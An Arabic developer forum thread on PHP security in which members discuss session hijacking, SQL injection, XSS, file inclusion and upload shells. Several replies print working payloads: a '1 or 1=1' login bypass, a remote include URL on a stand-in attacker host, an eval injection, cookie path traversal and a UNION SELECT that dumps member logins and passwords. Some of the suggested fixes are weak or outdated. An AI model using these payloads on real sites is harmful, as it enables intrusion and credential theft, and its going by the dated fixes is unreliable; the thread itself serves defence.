• 0
bastr3

الثغرات وطرق الحماية من الهاكر

سؤال

السلام عليكــم ورحمـة الله وبركاتــة ،،

في هذا الموضوع أريد طرح مشاكل إستخدام دوال تمكن أن تعرض المواقع لثغرات كبيره

لقد وقعت في عدة مشاكل بسبب هذه الثغرت لذلك فكرت في أن المبرمج يجب عليه الإحاطه بكل مايريد إستخدامه من سكريبتات أو دوال

سيتم طرح مشاكل حصلت معنا ويقوم الآخرين بحلها

أو يمكنك عرض الثغره مع الحل

سأبدأ أنا في طرح ثغره ولا أعلم حلها

في البدايه هل يمكن للهاكر أن يعرف ماهي المتغيرات المستخدمه في الجلسه ؟ يعني مثلا إذا كان لديه حساب في هذا الموقع ويريد تخريب حسابات الآخرين ؟

ماهي الطريقه المثلى لحماية صفحة وجعلها قابله للقرءه من خلال جلسة عمل ؟

هل عمليه تغيير إسم المجلد الخاص بالجلسات مهمه ؟ (مثل مجلد لوحة التحكم )

وشكرا لكل من سيساهم

* تنبيه : أرجو أن يكون الموضوع علمي ولا يتم طرح مشاركات الشكر

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

31 إجابة على هذا السؤال .

  • 0

بحسب علمي: المشاكلة الناتجة من الجلسات فقط (اقصد.. بافتراض عدم وجود ثغرة اخرى) تتمحور حول session hijacking راجع http://en.wikipedia.org/wiki/Session_hijacking

وهنا التحدي في التاكد ان الشخص(الانسان تحديدا!) المتعامل مع الجلسه هو نفسه من بدايتها حتى نهايتها. وهذا الموضوع غالبا مرتبط بال cookies و ال IP address الخ..

اما "مكان" تخزين معلومات الجلسة فبإعتقادي يتم تغييره لتفادي ثغرات اخرى قد تؤدي لسرقة بعض معلومات المستخدمين.. وربما hijack للجلسة بعد قراءة معلوماتها.

موضوع مهم برأيي... قد يكون هذا المجال هو الاضعف عند المبرمجين العرب.. ربما لان المعلومات حوله اقل توفر ومهم جدا كونها جديده، أو قد يراها البعض ممله او معقده.

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

جميل ... مافهمته أننا يجب أن نقوم بتخزين بيانات المستخدم مثل رقم الجلسة والآي بي والكوكيز على أساس التأكد من أن نفس الشخص مازال يعمل في نفس الجلسة , هذا مفيد جدا لآن الهاكر يمكنهم الدخول إلى الجلسات عن طريق اليو أر إل إذا كان يحمل رقم الجلسه وقد جربت ذلك عندما تقوم بنقل الجلسة من صفحة إلى أخرى خصوصا في حالة الآي فريم , لآنك ستظطر إلى إرسال رقم الجلسه من خلال الرابط (url)

كنت أتساءل عن إمكانيه معرفة المتغيرات المستخدمه في الجلسه

لآن الكثير يقومون بتخزين متغير في حالة تسجيل الدخول وإعطائه قيمه وفي باقي الصفحات يكون السؤال هل هذا المتغير يساوي هذه القيمة ... فإذا كان يمكن معرفة المتغيرات في الجلسة وقيمتها فهنا نتأكد من أن هذه هي الثغرة التي تسبب ضرب المواقع العربيه بشكل كبير

وأريد السؤال حول إمكانيه الوصول إلى مجلد الهوم أي الخروج من المجلد الرئيسي للموقع والتحكم في مجلد الهوم مثلا ,,, هل هذا يمكن من خلال ثغرات البرمجه ؟ هنا أنا لا أسأل عن ثغرات السيرفر ولكن البرمجه بشكل مباشر

وشكرا لك أخي رايان

بارك الله بك

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

بالضبط.. ففي السابق (استبعد ان هذا مازال يحصل) كان المهاجم يكتفي باضافة صفحة على الانترنت و رابط لها من البرنامج المراد مهاجمته، الصفحة مجرد تكتب

 $_SERVER['HTTP_REFERER']

كل ما عليه الدخول قبل ان يتم تدمير الجلسه تلقائيا

لكن اليوم اعتقد اغلب البرامج تتابع ال IP و تضع cookie مشفر في جهاز الزائر. كل هذا ممكن التحايل عليه بحالات معينه.

بالنسبة لموضوع المجلدات... طبعا ممكن .. حالتين افكر فيها(غالبا فيه افكار اكثر)

include('inc/templates/'.$_COOKIE['template_folder')];

كل ما على المهاجم تغيير معلومات الكوكي ال ../../../../ للوصول

فكرة اخرى اذا استطاع يعمل code injection

<?php

$_GET['name']=stripslashes($_GET['name']);

eval('echo '.$_GET['name'].';');

?>

//then access, where you can use file system functions instead of phpinfo
http://localhost/x.php?name=;phpinfo()

المثال الاخير قد يكون سيء ، ممكن تبحث على الانترنت عن امثلة اكثر ، اكتب PHP CODE INJECTION

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

رأئع ... من هنا نفهم أن إستخدام الكوكيز في عمليات معينه لاينصح به مثل إمتداد لباث ميعين أو تنفيذ ما بداخل الكوكيز , وممكن نكتفي فقط بإعطاء الكوكيز قيمه ونقوم بالتأكد من شيفرة هذه القيمه في كل مرة نستدعي بها الكوكيز

مثل عمليات البرج ماتش (preg_match)

اليوم توصلت إلى عدة ثغرات كنت واقعا بها في مجلة مازلت أعمل عليها

من هذه الثغرات عملية تسجيل الدخول فقط كنت أكتفي بسرد جملة السيكول مثل

select * from user where user = $user and pass=$pass

وبعدها أتأكد إذا كان هناك نتائج إذن فهذا المستخدم موجود

لا حظت أن الهاكر يستخدموا هذه الثغره بشكل بسيط وهوه إرسال الباسوورد مثلا كمايلي

1 or 1=1
وبهذا تصبح جملة السيكول كما يلي
select * from user where user = $user and pass=1 or 1=1

نلاحظ أن الجمله تعني تجاهل اليوزر نيم والباسوورد وسرد جميع المستخدمين

لحل هذه الثغرة إستخدمت البرج ماتش بحيث لايتم قبول اليوزر نيم أو الباسوورد إذ إحتوى على علامات مثل

[email protected]#$%^&*)(:"';

فهل هذا كافي ؟

مع العلم أن إستخدام الكوكيز تم بطريقه أخرى لتفادي الهاكر وهي كالتالي

أولا تخزين قيمة عشوائيه في قاعدة البيانات وتخزينها في جهاز المستخدم بشكل كوكيز

السؤال في بداية كل صفحة عن تساوي قيمة الكوكيز والقيمة التي في قاعدة البيانات وإلا فأخرج

فهل هذه الطريقة جيده ؟

هناك طرق فكرت بها من ناحية مجلد لوحة التحكم , عملية جعل مجلد لوحة التحكم عباره عن ملف مضغوط مشفر وفي حالة عملية تسجيل الدخول( من صفحة خارجية ) يتم فك تشفير الملف المضغوط وفك ضغطه بإسم مجلد عشوائي وتحويل المستخدم إلى هذا المجلد , أعتقد أنها فكرة قويه وتطبيقها سهل ولكن موارد السيرفر أعتقد يمكن أن تتضرر ؟ فما رأيك ؟

شكرا لك وياريت الآخرين يشاركونا

تم تعديل بواسطه bastr3
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

الجلسات تسجل في السيرفير لن يستطيع الوصول اليها طول ماهي غير مرسله في رابط

ولو ارسلت في رابط اصبحت من نوع get وليس session

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

شكرا لك أخي rewsh على هذه المعلومه

اليوم حاولت جاهدا معرفة أهم الثغرات التي تكون في مواقعنا وسبب كثير من ضرب المواقع

كانت هذه الثغرات متركزه في جمل سيكول كما ذكرت سابقا , كنت أعتقد أن هذه الثغره فقط في عملية تسجيل الدخول ولكني وجدت أنها في أي عمليه تستخدم السيكول يمكن إختراق الموقع وتسمى sql injection طبعا بعد بحث إكتشفت أن هذه ثغرة يستخدمها الكراكرز لإختراق المواقع وأسميتهم كراكرز لآنهم مخربون فقط أما الهاكر فهم مبرمجون قويون مثلي :D

المهم يمكن لآي شخص لبحث عن هذه الكلمة sql injection ليعرف المزيد عن هذه الثغره وذكرت من قبل كيف يمكن حل مشكله هذه الثغرة ولكن للتذكير هذه الثغرة ممكن أن تستخدم في عرض صحفة مثل

where ID=$Id

الثغره الأخرى التي وجدتها تسمى XSS لم أتبحر بها كثيرا ولكني فهمت أنها عمليه طباعة متغير قادم من الرابط مثل في عمليه تعبئة النموذج نكتب

if($id){
echo $id;
select * from page where id=$id
echo $row[2]
}

هنا نلاحظ أننا قمنا بطباعة رقم الصفحة القادم من الرابط لنسهل على أنفسنا أمرا ما مثل أنت في الصفحة ($id) وهكذا

هنا يقوم المخترقون بعمل كود جافا سكريبت يقوم بعمل أشياء كثيره جدا , الأمر معقد في الشرح ولكن يمكن حذف ملفات السيرفر أو إرسال رابط موقعك إلى شخص آخر ويكون الموقع يحتوي على بيانات لم تقم أصلا بوضعها , وهذه الثغرة كانت موجوده في موقع هوت ميل كما قرأت

ويمكن إستخدامها في عملية الإنكلود

فيكون الرابط كما يلي :

http://www.site.com/?page=b.php

وفي الكود يكون كما يلي :

include ($page)

فيقوم المخترق بعمل الرابط كما يلي :

http://www.site.com/?page=http://www.hacksite.com/mycode.php

مما يسبب تنفيذ الصفحة التي قام بإستدعائها وممكن أن تحتوي على كود شيل أو كود بي أتش بي يدمر الموقع

هذه الثغرات الحقيقه كثير ما نقع بها وعندما يجد الجد نندم لآننا لم نقم ببناء الموقع بشكل صحيح وخالي من الثغرات المعروفه على الأقل

هل هناك ثغرات أخرى ؟ هذا السؤال لك أيها الزائر ... فإن كنت تعرف ثغرات قم بسردها ليكتمل الموضوع

شكرا لكم

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0
الجلسات تسجل في السيرفير لن يستطيع الوصول اليها طول ماهي غير مرسله في رابط

ولو ارسلت في رابط اصبحت من نوع get وليس session

كلام فيه جزء من الصحه.. لكنه فيه فهم خاطئ

الوضع الطبيعي -اي الاعدادات الافتراضيه- تسجل الsessions على ملفات في مجلد اسمه tmp يمكن لأي شخص قراءته

نعم تسجل في السيرفر.. لكن الجميع يستطيع الوصول اليها مالم تغير الاعدادات

احد اشهر الاساليب تخزينها في قواعد البيانات

بالنسبة لمسألة تخزينها في الرابط... صح.. لكن ممكن يوصل لها بطرق اخرى... يمكن بس ما مرت عليك :)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

مشاركه بسيطه للتنقيح

كلام فيه جزء من الصحه.. لكنه فيه فهم خاطئ

الوضع الطبيعي -اي الاعدادات الافتراضيه- تسجل الsessions على ملفات في مجلد اسمه tmp يمكن لأي شخص قراءته

نعم تسجل في السيرفر.. لكن الجميع يستطيع الوصول اليها مالم تغير الاعدادات

احد اشهر الاساليب تخزينها في قواعد البيانات

بالنسبة لمسألة تخزينها في الرابط... صح.. لكن ممكن يوصل لها بطرق اخرى... يمكن بس ما مرت عليك :)

شكرا للتوضيح

تمام كلامك سليم كنت اقصد ان السيشين الوضع الطبيعي ليس الوصول لها عن طريق الرابط لان البيانات المدخله بالروابط كلها تكون عن طريق

get

وهذه سهل الحمايه منها

-------

اما بخصوص السيشين وكما تفضلت يتم تسجيلها في السيرفير

كنت اشرح فقط ان السيشين مختلفه عن ال get

---------

لم اقرا بصراحه في طرق الوصول الى السيشين اتمنى تزيدنا خبره من علمك في هذا الموضوع

hacker.rar

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

bastr3

بالنسبة لردك الاول:

هذي SQL Injection 101 لكن فيه افكار معقده اكثر من كذا تستخدم، بأي حال.. اهم شي add_slashes عند اضافة أي نص لـ sql query

اما حلك... فعلا المهم هنا ' أو " (حسب كودك) انت بالطريقة هذا تمنع استخدام كل هذه العلانات في كلمة المرور.

بالنسبة للكوكيز، الفكره هنا... مثلا قررنا تخزين عدد زيارات المستخدم (من نفس الجهاز والمتصفح) على كوكي... المشكله الان انه ممكن يغيرها و قنع البرنامج انه زار الموقع 100 ترليون مره (ممكن يواجه مشكله مع احجام المتغيرات.... غير مهم!!) بأي حال... الحل هنا نخزن عنده

$_COOKIE['visites'] = $new_number_of_visites;
$_COOKIE['secret_hash'] = md5($new_number_of_visites.'some.very.secret.string');

//then when checking
if(md5($_COOKIE['visites'].'some.very.secret.string')!=$_COOKIE['secret_hash'])
{
echo 'CHEATER!';
}

اما موضوع استخدام zipped files طبعا لا! فيه حلول افضل كثير... هذا مثل الهروب من مواجهة المشكله :) او نقلها لموضوع اخر (فك تشفير الملف مثلا)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

بالنسبة للرد الثاني:

انت تتكلم هنا عن تقريبا ثلاث انواع من الثغرات (لكل منها كتب ومواقع تتحدث عنها)

1- sql injections

وبشكل عام add_slashes تحل هذا المشكله

2- XSS

هناك نوعين.. الاول non-presistent XSS وبهذي الحاله تحتاج الضحيه (وهو هنا الزائر تحديدا وليس السيرفر) يدخل الموقع تحت شروط معينه... اما لازم يرسل GET معين (الاشهر بدون منازع) او POST او COOKIE(صعب طبعا) ... بعد ما يدخل محتوى الموقع بيكون متغير (الاساليب كثيره جدا).. ابسط شي ، اذا قام بتسجيل الدخول ترسل المعلومات لسيرفر المهاجم... واعقد (او اخطر شي) keyloggers -وانتشرت كثير.

اما presistent XSS هنا.. تغير بمحتوى الموقع... بحيث يتأثر الزوار بدون ما يحتاج المهاجم لارسالهم باسلوب معين

3- الانكلود و اوامر الشيل... هذي طبعا ثغرات قديمه لكن مازالت موجوده وتتجدد

مواقع ممتازه

http://www.xssed.com

http://www.webappsec.org

-------

شخصيا افكر بالتخصص في ال security بعد البكالوريوس(بعد 3اشهر انتهي باذن الله) الموضوع ممتع بالنسبة لي خاصة واني بديت ابحث واستعد لشهادات في هذا المجال....

فبما أنه نوعا ما في نفس مجال الموضوع.. أي شخص يملك معلومات عن نظرة الشركات في العالم العربي (والسعوديه بالتحديد) عن شهادات مثل

- سيسكو: CCNA Security CCSP

-مايكروسوفت: Microsoft Certified System Administrator (MCSA) – Security and Microsoft Certified Systems Engineer (MCSE) – Security

-SANS & GIAC شهادات مثل GSEC, GCIA, and GCIH then eventually GSE.

- CISSP اعرف اني احتاج خبره عمليه قبل البداية فيها... لكن يهمني اعرف تاثيرها في سوق العمل من الان

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

بعض المعلومات عن SQL injection و Cross-Site Scripting (XSS) من صفحات المنتدى:

http://www.arabteam2000-forum.com/index.ph...st&p=882089

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

الملف إللي أرسله الأخ rewsh يحتوي على دوال جميله وتحل المشاكل التي تحدثنا عنها .. شكرا لك أخي الكريم

سؤال : هل هناك ثغرات غير التي ذكرت ... في مجال البي أتش بي وليس مجال السيرفر كما ذكرت , فهذا الموضوع لمبرمجي البي أتش بي (أعتقد الدوت نت عباره عن ثغره بس كبيره :D )

الأخ Ryn أتمنى لك التوفيق في دراستك ... أعتقد شهادات السيسكو مطلوبه بالخليج ولها مستقبل ممتاز خصوصا إذا وصلت إلى شهادات متقدمه

أما شهادات مايكروسوفت فقد بدأت بالتراجع خصوصا مع وجود عدد هائل من أصحاب شهادات مايكروسوفت وعملية إصدار إصدارات جديده كل يومين تقريبا (أتحدث هنا عن شهادات MCSE - MCAD الخاصه بالشبكات والبرمجه) لا أعلم الكثير عن شهادات السكيورتي خصوصا عندما تجتمع كلمة سكيورتي مع مايكروسوفت تصبح الجمله عباره عن نكته :P

سؤال : أليست أقوى السيرفرات في العالم هي سيرفرات لينكس والسيرفرات الخاصه بمايكروسوفت لا تصلح لأي شيء تقريبا ؟

وهناك سيرفرات سن وأوبن سولاريس وغيرها ولكن لم أسمع عن سيرفرات مايكروسوفت من ناحية الأمن والحمايه

إذا كان كلامي صحيح فلماذا تفكر في مايكروسوفت ؟

الأخ Xacker أعتقد أنك هاكر , شكرا للرابط ففيه شرح عميق بالنسبه للثغرات التي ذكرت

أنتظر ثغرات أخرى يمكن أن نتفاداها وسألخص فيما بعد كيف يمكن التخلص من الثغرات التي قرأت عنها فهي حتى الآن تتلخص فيما ذكر ولكن بأساليب أخرى

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

لانه يبدو لي ان الشركات تفضل تقنيات مايكروسوفت ... ايضا الاختيارات قليله ، شهادات سيسكو عن الشبكات فقط. و GIAC غالية (10 الاف ريال للكتب الدورة والتعليم الذاتي، 13الف لحضورها... لكنها تقام حول العالم باوقات معينه.. هذي 5 الى 10 الاف اضافيه مصاريف سفر الخ) فأحتاج ان اتاكد انها فعلا جيده قبل الاستثمار فيها.. الخيار الاخير CISSP يطلب مني خبره 5 سنوات :(

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

أيضا سيسكو تحتاج إلى خبرة بين كل شهادة وشهادة يعني زي شهادات السواقه عنا بالأردن .. إذا بدك تطلع عمومي لازم يكون إلك سنتين ماخد الخصوصي والسيسكو نفس القصه بعرف إنو أصحاب الشهادات المتقدمة بتقاضوا رواتب عاليه جدا وبكون عهدهم بالسيسكو أكثر من عشر سنوات , هذه المعلومات من صديق لي أخذ أول دورة بس ماقدم للإمتحان وهوه الحين في دبي فما قدرت أستفسر منه , إللي فهمته منه إنو الإمتحانات في الأدرن ممكن تقدملها خصوصا الشهادات الأولى

أنا أعقتد أن الأمر كلما كان معقدا ويحتاج بذل جهود كلما كان مثمرا , يعني شهادات مايكروسوفت كثيرون الحاصلون عليها ولي صديقين حصلوا عليها بالغش وكانت الشركات لاتهتم بشهاداتهم كثيرا لآن الحاصلين عليها كثر وإنما تهتم بالتطبيق العملي والشهاده لها دور في عملية الموافقه على المقابله والراتب بعد الفحص العملي

أما سيسكو فهي لشركات متخصصه وغالبا ماتكون شركات ضخمه مثل الإتصالات والبنوك وغيرها وتحتاج هذه الشركات الخبراء ولن تجد كثيرين في بلدك يعرفون في تقنيات الشبكات خصوصا الحديثة وكما ترى فنحن في عهد الشبكات كل يوم نرى تجدد في عملية نقل البيانات

هذا فيديو معبر http://www.youtube.com/watch?v=rcfNC_x0VvE

إذا أردت التحدث عن التميز والإنفرادية فيجب أن تتعب في البداية ويأخذ هذا وقتا طويلا فمن أراد العلا سهر الليالي

و إذا كنت تتحدث عن فرص العمل والوظيفة والراتب العادي والشركات الصغيره فمايكروسوفت مثال رائع

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0
أيضا سيسكو تحتاج إلى خبرة بين كل شهادة وشهادة يعني زي شهادات السواقه عنا بالأردن .. إذا بدك تطلع عمومي لازم يكون إلك سنتين ماخد الخصوصي والسيسكو نفس القصه بعرف إنو أصحاب الشهادات المتقدمة بتقاضوا رواتب عاليه جدا وبكون عهدهم بالسيسكو أكثر من عشر سنوات , هذه المعلومات من صديق لي أخذ أول دورة بس ماقدم للإمتحان وهوه الحين في دبي فما قدرت أستفسر منه , إللي فهمته منه إنو الإمتحانات في الأدرن ممكن تقدملها خصوصا الشهادات الأولى

أنا أعقتد أن الأمر كلما كان معقدا ويحتاج بذل جهود كلما كان مثمرا , يعني شهادات مايكروسوفت كثيرون الحاصلون عليها ولي صديقين حصلوا عليها بالغش وكانت الشركات لاتهتم بشهاداتهم كثيرا لآن الحاصلين عليها كثر وإنما تهتم بالتطبيق العملي والشهاده لها دور في عملية الموافقه على المقابله والراتب بعد الفحص العملي

أما سيسكو فهي لشركات متخصصه وغالبا ماتكون شركات ضخمه مثل الإتصالات والبنوك وغيرها وتحتاج هذه الشركات الخبراء ولن تجد كثيرين في بلدك يعرفون في تقنيات الشبكات خصوصا الحديثة وكما ترى فنحن في عهد الشبكات كل يوم نرى تجدد في عملية نقل البيانات

هذا فيديو معبر http://www.youtube.com/watch?v=rcfNC_x0VvE

إذا أردت التحدث عن التميز والإنفرادية فيجب أن تتعب في البداية ويأخذ هذا وقتا طويلا فمن أراد العلا سهر الليالي

و إذا كنت تتحدث عن فرص العمل والوظيفة والراتب العادي والشركات الصغيره فمايكروسوفت مثال رائع

رائع جدا الرد وفيها معلومات عن السواقة ههه قصدي معلومات بالفعل جميلة و الله يعطيك العافية

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

:: نرجع لموضوعنا ::

جربت أعمل سكريبت لحل هذه الثغرات بدون تغيير في محتوى السكريبت الأصلي

يعني حاولت أعمل سكريبت فقط عند إستدعاءه يحل هذه المشكله دون تتبع الكود ومعرفة نقاط الضعف لعدد المواقع الذي قمت بإنشاءها وجدت ان مثل هذه الثغرات وتتبعها سيكون أمرا صعبا جدا

ولكن لا أعلم مدى فعالية هذا السكريبت وهل يمكن إستخدامه لكل السكريبتات دون أي مشكله ؟

هذا هو السكريبت ويوضع في أول كل صفحة طبعا بعد بدء الجلسة والهيدر بشكل عام

foreach($_GET as $KEy => $VAl){ $$KEy=htmlspecialchars(strip_tags(addslashes($VAl))); }
foreach($_POST as $KEy => $VAl){ $$KEy=htmlspecialchars(strip_tags(addslashes($VAl))); }

فهل هذا كافي ؟

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اظن انه كافي كحمايه بس اظن ان احيانا نحتاج بعض وسوم ال html

ممكن تضع متغير يحمل التاج التي تريديها

بس تاكد عندما يكون المتغير المرسل

name[]

حيث سوف يكون اراي فتاكد ان القيم الداخليه له سوف تمر على الداله بشكل جيد

نستخدم هذا الشكل عندما نريد ارسال اكثر من قيمه بنفس الاسم

------------

افكر جديا في دراسه في مجال السيكورتي

لو في احد يريد ممكن نتابع سويا

اتمنى ان اجد من يشجعني

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0
افكر جديا في دراسه في مجال السيكورتي

لو في احد يريد ممكن نتابع سويا

اتمنى ان اجد من يشجعني

ماذا تقصد بالدراسة هنا ؟

أنا أريد أن أخرج بهذا الموضوع بكود يمكن لآي مبرمج قام ببرمجة موقع قديما ويريد حمايته فقط يستدعي داله في بداية الصفحة وينتهي الأمر بدل من أن يقوم بإعادة دراسة كود الموقع

فلدي عدة مواقع تحتاج مثل هذا الكود مبرمجه قبل أربعة سنوات وبعضها قبل ست سنوات ولا أريد دراسة نقاط الضعف في الكود فقط أضع هذه الدالة في أول الكود وإنتهى الأمر ولكن لا أريد أن يؤثر على المتغيرات أو عملها

لقد تحدثت عن وسوم الهتمل , سأقوم بعمل الداله وأضيف لها الوسوم من الملف الذي قمت بإرساله ومن ثم أجرب وأرد لك الخبر ...

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

بالواقع هذي الدالة خطأ امني كبير... انت سمحت للمهاجم انه ينشئ أي متغير في برنامجك (فيه قيود على القيمه... لكن أيمتغير!! بأي اسم)

تخير شيء مثل

http://www.site.com/index.php?logged=true

طبعا يعتمد على برنامجك... لكن هذا الخطأ اذا اجتمع مع غلطه بسييييطه مثل نسيان initialization يصير ثغره

---------------

شخصيا استغني عن addslashes بـ

## Quotes Escaping
if(ini_get('magic_quotes_gpc')==0 || ini_get('magic_quotes_runtime')==1 || ini_get('magic_quotes_sybase')==1)
{
ini_set('magic_quotes_gpc',1);
ini_set('magic_quotes_runtime',0);
ini_set('magic_quotes_sybase',0);
}

اضعها في global include

بالنسبة لـ strip_tags انا ضد استخدامها... لان المستخدم اذا كتب

Hey friend, I just read about the HTML tag <script> some very interesting things!

اذا مسحتها هنا... انت غيرت المعنى

اما htmlspecialchars انا استخدم برنامج templates فيه داله اسمها assign لاضافة محتوى متغير للصفحه.. عملت للداله overwrite بحيث تطبق htmlspecialchars قبل اضافة أي شي للصفحه

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

كنت اقصد الدراسه للشهاده وليس السكربتات

الوضعتها لك جيده

ممكن تستخدمها على الكود الذي انت تفضلت بانزاله سوف تقوم باللازم ويمكن زياده الحمايه فيها ان منعت ال html تمام

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

ثغرة رفع الملفات التي تحتوي على شيل كود ؟؟؟

كيف يمكن أن نتفاداها ؟

إذا إعتمدنا على الإمتداد فهذا لا يكفي لآن بعض السيرفرات تسمح بتنفيذ أي ملف بغض النظر عن إمتداده

أرجوا ممن لديه إجابه التفضل بذكرها

_____ خارج عن الموضوع الأصلي ________

*لحل المشكله من خلال السيرفر

لو أردنا أن نعدل في السيرفر إعدادات تنفيذ أي ملف والإقتصار على إمتداد .php كيف يتم ذلك ؟

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

الفكرة ان المجلد الذي يتم تحميل الملفات له لايسمح بتنفيذ الملفات داخل.. وهذا يعتمد على نظام التشغيل في السيرفر

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

مرحباااا

موضوع شيق :) حاب اكتب وما اعرف وين وصلتوا p:

عموما راح احط مثال على ثغرة حقن (اخطر شيء حاليا) ومصابه بها اكبر المواقع

هذا الكود في احدى ملفات احد السكربتات ونكدر نشوف مكتشف الثغره مأشر ع الشطر الي بي الخطاء وهو اسعلام من القاعده

بدون ميقفلها مثل ميكولون

$id = $_GET['category_id']; // <== you know!
$query = "SELECT * FROM type WHERE id=$id"; // <== did you got it!, damn, check it again.
$result = mysql_query($query);
$row = mysql_fetch_array($result);

طبعا بواسطة ثغرات الحقن يستعطيع المخترق تصفح كل قاعدة البينات واظهار النتائج منها من خلال عرضها في الاخطاء التي تظهر في الصفحه errors

يعني دائما وابدا لا تنسى استخدام @

شوف كود الاستغلال لهذا الخطاء

http://127.0.0.1/x/x.php?category_id=5 UNION ALL SELECT 1,2,concat(login,0x3a,passwd),4,5,6,7,8,9,10 FROM members

شوف الاوامر الممرره بلغة SQL

الي ينطي خطوره بنظري للSQL Injection وللعلم هيه على انواع

انها لا تحتاج لسكربت وتبحث عن الثغره داخل الكود

يعني يمكن ان تبرمج برمجه خاصه ولما ييجيك المخترك يجب الحق بالاحتمالات مثل الارقام الفوق

حتى يصل الى عمود اليوزرس والباسورد طبعا بعض الاحيان يكون الباسورد مشفر بال md5

وهذا يحبط البعض لان هذه مصفوفه باتجاه واحد مثل ما نعرف بس اكو ناس اعرف انهم لا يهتموا

ولكل واحد طريقه خاصه وطريقة تفكيرهم عميقه جدا

يعني الى اخويه ريان الله يعينك مع السكيورتي لو تصبح هكر وبعدها سكيورتي يكون ممتاز لانك عرفت اساليبهم وطرق تفكيرهم

هناك شهاده لا يحضرني اسمها تدربك لتصبح هكر مسالم اي تحارب الهكر بطريقتهم :)

واخيرا اسف ع الاطاله وضعت الثغره والاستغلال بدون ذكر السكربت

عموما مواقع الثغرات كثييييييييييره لكن مواقع اصلاحها قليييييله :(

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

أخي عنكبو جزاك الله خير

الثغرات إذا إنكشف مكانها تم حلها لذلك لايوجد مواقع لإصلاح الثغرات

المشكله التي ذكرتها تم حلها من خلال كود تم إضافته من أحد الأخوه وقمت بتطوير كود ولكن ينقصه بعض الأفكار , أنا إستخدمته في مواقعي :) ماينقصه هو معرفة إذا المتغير عباره عن مصفوفه وتعيين عدد المتغيرات وأسماءها , بعدين بشرح الفكرة والشكر موصول لجميع المشاركين.

بالنسبه لمثغرة رفع الملفات قمت بالبحث الطويل ووجدت بعض الأكواد الطويييييله وأنا من عادتي لا أحب الكود الطويل لذلك لجأت إلى أوامر الشيل كوماند

لقد كانت رائعه .. أصبح الكود بدلا من خمس صفحات وكلاسات وقصص ودوخه أصبح الكود عباره عن ثلاث أسطر :

		if (is_uploaded_file($F1))
{
$Image = $_FILES["F1"]["name"];
move_uploaded_file($F1, "images/{$Image}");
exec("file /home/$domain_name/public_html/images/{$ImageT}",$b);
$x= strpos($b[0],"image data");$x1=strpos($b[0],"Flash data");
if(!$x && !$x1){
unlink("/home/$domain_name/public_html/images/{$ImageT}");$msg_Error= "%invaled file format%'<br>";
{
}

دالة فايل في شيل كوماند ترجع نوع الملف ولا تهتم بالإمتداد

فأنت ترى ماهي الملفات التي تريد أن يتم رفعها إلى السيرفر وتوافق عليها

هنا يسمح لملفات الصور والفلاش فقط

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

السلام عليكم

اخوتي الكرام اسمحوا لي ان اطرح مشكلة اتعرض لها حاليا ولا اعلم كيف احلها وهذه المشكلة حصلت معي اليوم ولم اجد لها حل الى الان

انا مستخدم خدمة رفع صور الى الموقع عن طريق كلاس اظن ان الجميع يعرفه ووضعته في المرفقات وللاسف بنيت عملي على هذا الكلاس دون ان اتحرى مشاكله وثغراته

المهم ان الموقع تم ايقافه نهائيا من السيرفر وتم ارسال رسالة ان الموقع يحوي ثغرة امنية

واكتشفت من وجود ملفات جديدة في الموقع اضافة الى وجود فايروس في مجلد غير المجلد الذي ارفع اليه الصور

واعتقد ان المشكلة من رفع الملفات وبصراحة معلوماتي قليلة جدا عن الموضوع فهل من مساعدة وشرح كيف تم اختراق الموقع اذا حدا عندو فكرة

واذا في حل سريع وجزاكم الله خيرا علما اني لا استطيع الاستغناء عن هذا الكلاس لان اشياء كثير مبنية عليه

حاولت ان اعمل تحديد للواحق المسموح بها ولم ينجح الامر او لم اعرف الطريقة الصحيحة وجزاكم الله خيرا

class.upload.rar

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

من فضلك سجل دخول لتتمكن من التعليق

ستتمكن من اضافه تعليقات بعد التسجيل



سجل دخولك الان

  • يستعرض القسم حالياً   0 members

    لا يوجد أعضاء مسجلين يشاهدون هذه الصفحة .